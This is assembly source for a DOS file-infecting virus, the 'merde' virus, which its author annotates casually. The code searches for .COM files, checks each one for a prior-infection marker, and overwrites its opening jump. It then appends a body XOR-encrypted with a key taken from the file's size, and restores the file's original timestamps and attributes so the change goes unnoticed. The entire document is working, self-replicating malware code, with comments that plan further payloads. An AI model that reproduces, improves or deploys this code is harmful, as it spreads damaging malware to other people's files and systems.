;well, here's the next installment of the merde virus...all that is new; ;is your run of the mill xor encryption........and a little change in; ;the code itself to make it slightly more modular...; ;up+coming: .exe version(why put 'em together? makes it too big); ; an actual function besides infect!; ; TSR infect version?; attrib equ 21 time equ 22 date equ 24 fspec_address equ 0e4h filesize equ 26 fname equ 30 dta equ 80h virsize equ 354 byte_compare_val equ 35 CODE_SEG SEGMENT BYTE ASSUME DS:CODE_SEG, CS:CODE_SEG ORG 100h first: jmp caller db 128 dup(00) caller: call caller2 ;si=this address for the whole thing; ;ok, for encryption, we use the value of the byte at the jump instruction; ;if the file we find isn't infected...; encryptv: db ? ;si=offset of the "caller"; caller2: pop si sub si,3 jmp getstart ;jmp to getstart and have it call us back, getting the address of "start"; ;into es..(I know, why not just add the size of the stuff to si?; ;I'll do it some other time; after: pop es ;es=start:; ;okay, I decided, arbitrarily, to use bp and jump from the encrypt; ;function so it was more unsingular to a particular circumstance; mov bp,es ;unencrypt de code+jump to virus; jmp encrypt ;if we are being called from the write proc, we need to save BP on the stack; encrypt_w: mov ax,bp ;ax=whereto jump at end; pop bp ;bp=return to write routine; push ax ;where to jump at end is on stack ;note the standard, run o' the mill encrypt/decrypt!; encrypt: push bx ;might not be needed, I'll check later; push si mov cl,[si+3] ;offset of encrypt value; mov bx,es ;where to start encrypting; xor si,si xloop: mov al,[bx+si] xor al,cl mov [bx+si],al cmp si,0e7h ;size of post-start(or close enough); ja done inc si jmp xloop done: pop si pop bx jmp bp ;jump whereever we were supposed to; write_code: call encrypt_w ;yep, encrypt it; pop bp ;get back address in this infected file; mov bx,[di+9] ;file to jump to, and file handle; mov ah,40h mov cx,virsize ;total virus size mov dx,si int 21h call close_current jmp nofiles ;not really, just didn't change name; ;this proc closes the file with original stats; close_current: mov dx,[di+14] mov cx,[di+12] mov ax,5701h mov bx,[di+9] int 21h mov ah,3eh int 21h mov ax,4301h xor ch,ch mov cl,[di+11] int 21h ret nofiles: push ds pop es jmp bp getstart: call after ;encrypted from here on out-es=start of this procedure; start: mov di,es add di,fspec_address ;di=ADDRESS OF FILESPEC!; mov dh,[di+18] mov ah,[di+17] mov al,[di+16] mov bx,100h mov [bx],al mov [bx+1],ah mov [bx+2],dh mov bp,bx mov ah,4eh ;------------------; mov cx,33 mov dx,di ;find file match; search: int 21h jc nofiles ;get out if none found; mov bx,dta+filesize ;compare filesize via BX; cmp word ptr [bx],65000 ja leave1 cmp word ptr [bx],150 jb leave1 jmp ok leave1: mov ah,4fh jmp search ok: CLC ;Okay-- DI=base of fspec; mov bx,dta+attrib mov al,[bx] mov [di+11],al ;save attrib; mov ax,word ptr [bx+1] mov [di+12],ax ;save time; mov ax,word ptr [bx+3] mov [di+14],ax ;save date; mov ax,4301h mov cx,0 mov dx,dta+fname int 21h ;set attrib to 0; label2: mov ax,3d02h int 21h mov [di+9],ax ;open + save handle; mov bx,ax mov ah,3fh mov cx,3 mov dx,di add dx,16 ;dx points to save area for first three bytes; int 21h ;open handle, and read 3 bytes into it; cmp byte ptr [di+16],0e9h jne label1 cont: mov ax,4200h xor cx,cx mov dx,[di+17] add dx,3+byte_compare_val mov bx,[di+9] int 21h mov ah,3fh mov cx,2 mov dx,di add dx,6 int 21h mov dx,[di+6] cmp dx,[si+byte_compare_val] jne label1 call close_current jmp leave1 label1: ;set encrypt value here---(low order byte of filesize of next file; mov bx,dta+filesize mov dl,[bx] mov [si+3],dl mov bx,[di+9] mov ax,4200h xor cx,cx mov dx,0 int 21h ;okay, this is kinda thick..; ;set pointer to after jmp instruct, and change address to size; ;of file plus 3 for jmp instruction, minding that we have to flip stuff; mov bx,dta+filesize mov dh,[bx+1] ;high val equals 2nd part of word+vice versa; mov dl,[bx] sub dx,3 mov [di+7],dx mov byte ptr [di+6],0e9h mov ah,40h mov bx,[di+9] mov dx,di add dx,6 mov cx,3 int 21h xor cx,cx mov ax,4202h xor dx,dx int 21h jmp write_code fspec: db '*.com',0 ;bx+0; disk_buffer: db 3 DUP(?) ;di+6; handle: dw ? ;di+9; attribute: db ? ;di+11; otime: dw ? ;di+12; odate: dw ? ;di+14; first_3: db 0cdh,20h,00 ;di+16; CODE_SEG ENDS END first